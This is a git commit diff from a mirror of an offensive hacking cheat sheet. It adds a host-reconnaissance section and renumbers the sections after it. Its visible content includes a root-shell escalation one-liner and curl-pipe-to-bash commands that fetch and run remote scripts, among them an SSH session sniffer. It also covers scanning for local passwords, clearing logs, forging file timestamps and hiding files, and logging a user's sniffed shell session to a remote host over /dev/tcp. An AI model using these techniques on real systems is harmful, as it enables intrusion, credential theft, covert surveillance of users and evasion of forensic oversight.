mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 12:48:36 +02:00
Merge branch 'master' of github.com:hackerschoice/thc-tips-tricks-hacks-cheat-sheet
This commit is contained in:
@@ -73,6 +73,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
|
||||
1. [Remote access an entire network](#backdoor-network)
|
||||
1. [Smallest PHP backdoor](#carriage-return-backdoor)
|
||||
1. [Local Root backdoor](#ld-backdoor)
|
||||
1. [Host Recon](#hostrecon)
|
||||
1. [Shell Hacks](#shell-hacks)
|
||||
1. [Shred files (secure delete)](#shred)
|
||||
1. [Restore the date of a file](#restore-timestamp)
|
||||
@@ -1537,11 +1538,67 @@ Become root
|
||||
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
|
||||
```
|
||||
|
||||
<a id="hostrecon"></a>
|
||||
## 7. Host Recon
|
||||
---
|
||||
|
||||
Get essential information about a host:
|
||||
```sh
|
||||
curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/whatserver.sh | bash
|
||||
```
|
||||
|
||||
Find out the Linux Distribution
|
||||
```sh
|
||||
uname -a; lsb_release -a 2>/dev/null; cat /etc/*release /etc/issue* /proc/version /etc/hosts 2>/dev/null
|
||||
```
|
||||
|
||||
netstat if there is no netstat/ss/lsof:
|
||||
```sh
|
||||
curl -fsSL https://raw.githubusercontent.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/master/tools/awk_netstat.sh | bash
|
||||
```
|
||||
|
||||
Speed check the system
|
||||
```sh
|
||||
curl -fsSL https://bench.sh | bash
|
||||
# Another speed check:
|
||||
# curl -fsSL https://yabs.sh | bash
|
||||
```
|
||||
|
||||
Find all suid/sgid binaries:
|
||||
```
|
||||
find / -xdev -type f -perm /6000 -ls 2>/dev/null
|
||||
```
|
||||
|
||||
Find all writeable directories:
|
||||
```sh
|
||||
wfind() {
|
||||
local arr dir
|
||||
|
||||
arr=("$@")
|
||||
while [[ ${#arr[@]} -gt 0 ]]; do
|
||||
dir=${arr[${#arr[@]}-1]}
|
||||
unset 'arr[${#arr[@]}-1]'
|
||||
find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null
|
||||
IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null))
|
||||
done
|
||||
}
|
||||
# Usage: wfind /
|
||||
# Usage: wfind /etc /var /usr
|
||||
```
|
||||
|
||||
Find local passwords:
|
||||
```sh
|
||||
curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16.0/noseyparker-v0.16.0-x86_64-unknown-linux-gnu.tar.gz | tar xvfz - --transform="flags=r;s|.*/||" --no-anchored --wildcards noseyparker && \
|
||||
./noseyparker scan . && \
|
||||
./noseyparker report
|
||||
```
|
||||
(Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history)
|
||||
|
||||
---
|
||||
<a id="shell-hacks"></a>
|
||||
## 7. Shell Hacks
|
||||
## 8. Shell Hacks
|
||||
<a id="shred"></a>
|
||||
**7.i. Shred & Erase a file**
|
||||
**8.i. Shred & Erase a file**
|
||||
|
||||
```sh
|
||||
shred -z foobar.txt
|
||||
@@ -1562,7 +1619,7 @@ Note: Or deploy your files in */dev/shm* directory so that no data is written to
|
||||
Note: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file.
|
||||
|
||||
<a id="restore-timestamp"></a>
|
||||
**7.ii. Restore the date of a file**
|
||||
**8.ii. Restore the date of a file**
|
||||
|
||||
Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
|
||||
|
||||
@@ -1571,7 +1628,7 @@ touch -r /etc/shadow /etc/passwd
|
||||
```
|
||||
|
||||
<a id="shell-clean-logs"></a>
|
||||
**7.iii. Clear logfile**
|
||||
**8.iii. Clear logfile**
|
||||
|
||||
This will reset the logfile to 0 without having to restart syslogd etc:
|
||||
```sh
|
||||
@@ -1588,7 +1645,7 @@ IFS="" a=$(sed "/${DEL}/d" <"${LOG}") && echo "$a">"${LOG}"
|
||||
```
|
||||
|
||||
<a id="shell-hide-files"></a>
|
||||
**7.iv. Hide files from that User without root privileges**
|
||||
**8.iv. Hide files from that User without root privileges**
|
||||
|
||||
Our favorite working directory is */dev/shm/*. This location is volatile memory and will be lost on reboot. NO LOGZ == NO CRIME.
|
||||
|
||||
@@ -1615,51 +1672,11 @@ mkdir $'\t'
|
||||
cd $'\t'
|
||||
```
|
||||
|
||||
<a id="linux-info"></a>
|
||||
**7.v. Find out Linux Distro**
|
||||
|
||||
```sh
|
||||
# Find out Linux Distribution
|
||||
uname -a; lsb_release -a 2>/dev/null; cat /etc/*release /etc/issue* /proc/version /etc/hosts 2>/dev/null
|
||||
```
|
||||
|
||||
```sh
|
||||
# Speed check the system
|
||||
curl -sL bench.sh | bash
|
||||
# Another speed check:
|
||||
# curl -sL yabs.sh | bash
|
||||
```
|
||||
|
||||
<a id="suid"></a>
|
||||
**7.vi. Find +s files / Find writeable directory**
|
||||
|
||||
Find all suid/sgid binaries:
|
||||
```
|
||||
find / -xdev -type f -perm /6000 -ls 2>/dev/null
|
||||
```
|
||||
|
||||
Find all writeable directories:
|
||||
```sh
|
||||
wfind() {
|
||||
local arr dir
|
||||
|
||||
arr=("$@")
|
||||
while [[ ${#arr[@]} -gt 0 ]]; do
|
||||
dir=${arr[${#arr[@]}-1]}
|
||||
unset 'arr[${#arr[@]}-1]'
|
||||
find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null
|
||||
IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null))
|
||||
done
|
||||
}
|
||||
# Usage: wfind /
|
||||
# Usage: wfind /etc /var /usr
|
||||
```
|
||||
|
||||
---
|
||||
<a id="crypto"></a>
|
||||
## 8. Crypto
|
||||
## 9. Crypto
|
||||
<a id="gen-password"></a>
|
||||
**8.i. Generate quick random Password**
|
||||
**9.i. Generate quick random Password**
|
||||
|
||||
Good for quick passwords without human element.
|
||||
|
||||
@@ -1680,7 +1697,7 @@ head -c 32 < /dev/urandom | base64 | tr -dc '[:alnum:]' | head -c 16
|
||||
```
|
||||
|
||||
<a id="crypto-filesystem"></a>
|
||||
**8.ii.a. Linux transportable encrypted filesystems - cryptsetup**
|
||||
**9.ii.a. Linux transportable encrypted filesystems - cryptsetup**
|
||||
|
||||
Create a 256MB large encrypted file system. You will be prompted for a password.
|
||||
|
||||
@@ -1705,7 +1722,7 @@ umount /mnt/sec
|
||||
cryptsetup close sec
|
||||
```
|
||||
<a id="encfs"></a>
|
||||
**8.ii.b. Linux transportable encrypted filesystems - EncFS**
|
||||
**9.ii.b. Linux transportable encrypted filesystems - EncFS**
|
||||
|
||||
Create ```.sec``` and store the encrypted data in ```.raw```:
|
||||
```sh
|
||||
@@ -1719,7 +1736,7 @@ fusermount -u .sec
|
||||
```
|
||||
|
||||
<a id="encrypting-file"></a>
|
||||
**8.iii Encrypting a file**
|
||||
**9.iii Encrypting a file**
|
||||
|
||||
Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):
|
||||
|
||||
@@ -1735,9 +1752,9 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I <input.txt.enc >input.
|
||||
|
||||
---
|
||||
<a id="ssh-sniffing"></a>
|
||||
## 9. SSH Sniffing
|
||||
## 10. SSH Sniffing
|
||||
<a id="ssh-sniffing-script"></a>
|
||||
**9.i Sniff a user's SHELL session with script**
|
||||
**10.i Sniff a user's SHELL session with script**
|
||||
|
||||
A method to log the shell session of a user (who logged in via SSH).
|
||||
|
||||
@@ -1748,7 +1765,7 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile
|
||||
Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
|
||||
|
||||
<a id="dtrace"></a>
|
||||
**9.ii Sniff all SHELL sessions with dtrace - FreeBSD**
|
||||
**10.ii Sniff all SHELL sessions with dtrace - FreeBSD**
|
||||
|
||||
Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes.
|
||||
|
||||
@@ -1768,7 +1785,7 @@ Start a dtrace and log to /tmp/.log:
|
||||
```
|
||||
|
||||
<a id="bpf"></a>
|
||||
**9.iii Sniff all SHELL sessions with eBPF - Linux**
|
||||
**10.iii Sniff all SHELL sessions with eBPF - Linux**
|
||||
|
||||
eBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better "dtrace" but for Linux.
|
||||
|
||||
@@ -1781,7 +1798,7 @@ curl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/pty
|
||||
Check out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://github.com/hackerschoice/bpfhacks).
|
||||
|
||||
<a id="ssh-sniffing-strace"></a>
|
||||
**9.iv Sniff a user's outgoing SSH session with strace**
|
||||
**10.iv Sniff a user's outgoing SSH session with strace**
|
||||
```sh
|
||||
strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
|
||||
```
|
||||
@@ -1789,7 +1806,7 @@ Dirty way to monitor a user who is using *ssh* to connect to another host from a
|
||||
|
||||
|
||||
<a id="ssh-sniffing-wrapper"></a>
|
||||
**9.v. Sniff a user's outgoing SSH session with a wrapper script**
|
||||
**10.v. Sniff a user's outgoing SSH session with a wrapper script**
|
||||
|
||||
Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions)
|
||||
|
||||
@@ -1835,7 +1852,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m
|
||||
The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH.
|
||||
|
||||
<a id="ssh-sniffing-sshit"></a>
|
||||
**9.vi Sniff a user's outgoing SSH session using SSH-IT**
|
||||
**10.vi Sniff a user's outgoing SSH session using SSH-IT**
|
||||
|
||||
The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/).
|
||||
|
||||
@@ -1844,7 +1861,7 @@ bash -c "$(curl -fsSL https://thc.org/ssh-it/x)"
|
||||
```
|
||||
|
||||
<a id="hijack"></a>
|
||||
**9.vii Hijack / Take-over a running SSH session**
|
||||
**10.vii Hijack / Take-over a running SSH session**
|
||||
|
||||
Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session:
|
||||
```sh
|
||||
@@ -1856,9 +1873,9 @@ ps ax -o pid,ppid,cmd | grep 'ssh '
|
||||
|
||||
---
|
||||
<a id="vpn-shell"></a>
|
||||
## 10. VPN & Shells
|
||||
## 11. VPN & Shells
|
||||
<a id="shell"></a>
|
||||
**10.i. Disposable Root Servers**
|
||||
**11.i. Disposable Root Servers**
|
||||
|
||||
```console
|
||||
$ ssh root@segfault.net # Use password 'segfault'
|
||||
@@ -1867,7 +1884,7 @@ $ ssh root@segfault.net # Use password 'segfault'
|
||||
https://thc.org/segfault
|
||||
|
||||
<a id="vpn"></a>
|
||||
**10.ii. VPN/VPS/Proxies**
|
||||
**11.ii. VPN/VPS/Proxies**
|
||||
|
||||
Trusted VPN Providers
|
||||
1. https://www.mullvad.net
|
||||
@@ -1906,7 +1923,7 @@ Many other services (for free)
|
||||
|
||||
---
|
||||
<a id="osint"></a>
|
||||
## 11. Intelligence Gathering
|
||||
## 12. Intelligence Gathering
|
||||
|
||||
| OSINT Hacker Tools ||
|
||||
| --- | --- |
|
||||
@@ -1938,9 +1955,9 @@ Many other services (for free)
|
||||
|
||||
---
|
||||
<a id="misc"></a>
|
||||
## 12. Miscellaneous
|
||||
## 13. Miscellaneous
|
||||
<a id="tools"></a>
|
||||
**12.i. Tools of the trade**
|
||||
**13.i. Tools of the trade**
|
||||
|
||||
Comms
|
||||
1. [CryptoStorm Email](https://www.cs.email/) - Disposable emails (send & receive). (List of [Disposable-email-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-email-services])).
|
||||
@@ -2052,13 +2069,13 @@ Mindmaps & Knowledge
|
||||
1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg)
|
||||
|
||||
<a id="cool-linux-commands"></a>
|
||||
**12.ii. Cool Linux commands**
|
||||
**13.ii. Cool Linux commands**
|
||||
|
||||
1. https://jvns.ca/blog/2022/04/12/a-list-of-new-ish--command-line-tools/
|
||||
1. https://github.com/ibraheemdev/modern-unix
|
||||
|
||||
<a id="tmux"></a>
|
||||
**12.iii. Tmux Cheat Sheet**
|
||||
**13.iii. Tmux Cheat Sheet**
|
||||
|
||||
|
||||
| | Tmux Cheat Sheet |
|
||||
@@ -2072,7 +2089,7 @@ Mindmaps & Knowledge
|
||||
| Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. |
|
||||
|
||||
<a id="useful-commands"></a>
|
||||
**12.iv. Useful commands**
|
||||
**13.iv. Useful commands**
|
||||
|
||||
Use `lsof -Pni` or `netstat -putan` (or `ss -putan`) to list all Internet (_-tu_) connections.
|
||||
|
||||
@@ -2097,7 +2114,7 @@ rlwrap --always-readline ssh user@host
|
||||
```
|
||||
---
|
||||
<a id="others"></a>
|
||||
## 13. Other Sites
|
||||
## 14. Other Sites
|
||||
|
||||
1. [Phineas Fisher](https://blog.isosceles.com/phineas-fisher-hacktivism-and-magic-tricks/) - No nonsense. Direct. How we like it.
|
||||
1. [Hacking HackingTeam - a HackBack](https://gist.github.com/jaredsburrows/9e121d2e5f1147ab12a696cf548b90b0) - Old but real talent at work.
|
||||
|
||||
Reference in New Issue
Block a user